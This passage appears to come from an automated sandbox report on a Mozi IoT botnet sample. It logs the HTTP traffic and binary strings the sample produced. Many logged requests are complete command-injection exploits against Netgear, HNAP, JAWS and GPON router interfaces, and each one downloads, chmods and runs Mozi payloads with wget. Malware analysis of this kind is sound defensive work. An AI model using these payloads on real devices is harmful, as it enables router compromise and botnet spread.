xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Host: 133.137.248.191:80Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://192.168.1.1:8088/Mozi.m && chmod 777 /tmp/Mozi.m && /tmp/Mozi.m`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                Source: /tmp/MGuvcs6Ocz (PID: 4622)Socket: 0.0.0.0::44343
                Source: unknownTCP traffic detected without corresponding DNS query: 121.130.248.221
                Source: unknownTCP traffic detected without corresponding DNS query: 71.181.75.105
                Source: unknownTCP traffic detected without corresponding DNS query: 168.27.245.114
                Source: unknownTCP traffic detected without corresponding DNS query: 87.83.202.29
                Source: unknownTCP traffic detected without corresponding DNS query: 137.88.31.213
                Source: unknownTCP traffic detected without corresponding DNS query: 48.145.90.179
                Source: unknownTCP traffic detected without corresponding DNS query: 157.46.152.22
                Source: unknownTCP traffic detected without corresponding DNS query: 219.143.155.172
                Source: unknownTCP traffic detected without corresponding DNS query: 24.81.183.180
                Source: unknownTCP traffic detected without corresponding DNS query: 11.140.34.223
                Source: unknownTCP traffic detected without corresponding DNS query: 71.11.190.90
                Source: unknownTCP traffic detected without corresponding DNS query: 191.250.144.46
                Source: unknownTCP traffic detected without corresponding DNS query: 37.215.228.246
                Source: unknownTCP traffic detected without corresponding DNS query: 205.51.33.91
                Source: unknownTCP traffic detected without corresponding DNS query: 103.102.254.14
                Source: unknownTCP traffic detected without corresponding DNS query: 154.136.201.94
                Source: unknownTCP traffic detected without corresponding DNS query: 204.189.67.153
                Source: unknownTCP traffic detected without corresponding DNS query: 164.142.55.184
                Source: unknownTCP traffic detected without corresponding DNS query: 15.51.212.241
                Source: unknownTCP traffic detected without corresponding DNS query: 7.224.163.250
                Source: unknownTCP traffic detected without corresponding DNS query: 118.114.67.42
                Source: unknownTCP traffic detected without corresponding DNS query: 57.163.20.143
                Source: unknownTCP traffic detected without corresponding DNS query: 193.22.15.210
                Source: unknownTCP traffic detected without corresponding DNS query: 94.185.176.145
                Source: unknownTCP traffic detected without corresponding DNS query: 78.27.98.91
                Source: unknownTCP traffic detected without corresponding DNS query: 36.54.249.217
                Source: unknownTCP traffic detected without corresponding DNS query: 160.226.225.149
                Source: unknownTCP traffic detected without corresponding DNS query: 184.235.140.0
                Source: unknownTCP traffic detected without corresponding DNS query: 130.140.7.168
                Source: unknownTCP traffic detected without corresponding DNS query: 131.112.27.0
                Source: unknownTCP traffic detected without corresponding DNS query: 184.49.220.2
                Source: unknownTCP traffic detected without corresponding DNS query: 166.216.172.210
                Source: unknownTCP traffic detected without corresponding DNS query: 98.135.167.186
                Source: unknownTCP traffic detected without corresponding DNS query: 2.99.233.91
                Source: unknownTCP traffic detected without corresponding DNS query: 211.105.77.124
                Source: unknownTCP traffic detected without corresponding DNS query: 103.186.65.125
                Source: unknownTCP traffic detected without corresponding DNS query: 1.172.219.187
                Source: unknownTCP traffic detected without corresponding DNS query: 50.192.24.84
                Source: unknownTCP traffic detected without corresponding DNS query: 58.244.219.70
                Source: unknownTCP traffic detected without corresponding DNS query: 7.177.190.112
                Source: unknownTCP traffic detected without corresponding DNS query: 88.91.75.33
                Source: unknownTCP traffic detected without corresponding DNS query: 163.206.226.193
                Source: unknownTCP traffic detected without corresponding DNS query: 134.67.11.73
                Source: unknownTCP traffic detected without corresponding DNS query: 30.115.123.158
                Source: unknownTCP traffic detected without corresponding DNS query: 12.220.127.50
                Source: unknownTCP traffic detected without corresponding DNS query: 51.78.124.189
                Source: unknownTCP traffic detected without corresponding DNS query: 212.212.35.40
                Source: unknownTCP traffic detected without corresponding DNS query: 32.39.252.126
                Source: unknownTCP traffic detected without corresponding DNS query: 15.178.136.128
                Source: unknownTCP traffic detected without corresponding DNS query: 92.69.32.77
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 13.226.101.83:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 99.192.234.217:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 185.29.123.11:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /language/Swedish${IFS}&&cd${IFS}/tmp;rm${IFS}-rf${IFS}*;wget${IFS}http://192.168.1.1:8088/Mozi.a;sh${IFS}/tmp/Mozi.a&>r&&tar${IFS}/string.js HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+varcroData Raw: Data Ascii:
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.207.67.88:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.217.112.105:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 23.76.236.93:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 79.171.18.106:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: global trafficHTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+*;wget+http://192.168.1.1:8088/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1User-Agent: Hello, worldHost: 154.90.79.101:80Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Connection: keep-alive
                Source: global trafficHTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://192.168.1.1:8088/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
                Source: unknownDNS traffic detected: queries for: dht.transmissionbt.com
                Source: unknownHTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 127.0.0.1:80Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: */*User-Agent: Hello, WorldContent-Length: 118Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 60 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 39 32 2e 31 36 38 2e 31 2e 31 3a 38 30 38 38 2f 4d 6f 7a 69 2e 6d 2b 2d 4f 2b 2d 3e 2f 74 6d 70 2f 67 70 6f 6e 38 30 3b 73 68 2b 2f 74 6d 70 2f 67 70 6f 6e 38 30 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=``;wget+http://192.168.1.1:8088/Mozi.m+-O+->/tmp/gpon80;sh+/tmp/gpon80&ipv=0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sun, 25 Apr 2021 18:59:02 GMTServer: Apache/2.4.41 ()Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.a;chmod
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.a;sh$
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.m
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.m;
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.m;$
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/bin.sh
                Source: MGuvcs6OczString found in binary or memory: http://%s:%d/bin.sh;chmod
                Source: MGuvcs6OczString found in binary or memory: http://127.0.0.1
                Source: MGuvcs6OczString found in binary or memory: http://127.0.0.1sendcmd
                Source: MGuvcs6OczString found in binary or memory: http://HTTP/1.1
                Source: MGuvcs6OczString found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
                Source: .config.8.drString found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
                Source: MGuvcs6OczString found in binary or memory: http://ipinfo.io/ip
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca)
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
                Source: alsa-info.sh0.8.drString found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
                Source: MGuvcs6OczString found in binary or memory: http://purenetworks.com/HNAP1/
                Source: MGuvcs6OczString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: MGuvcs6OczString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                Source: MGuvcs6OczString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/alsa-info.sh
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.alsa-project.org/cardinfo-db/
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca.
                Source: alsa-info.sh0.8.drString found in binary or memory: http://www.pastebin.ca/upload.php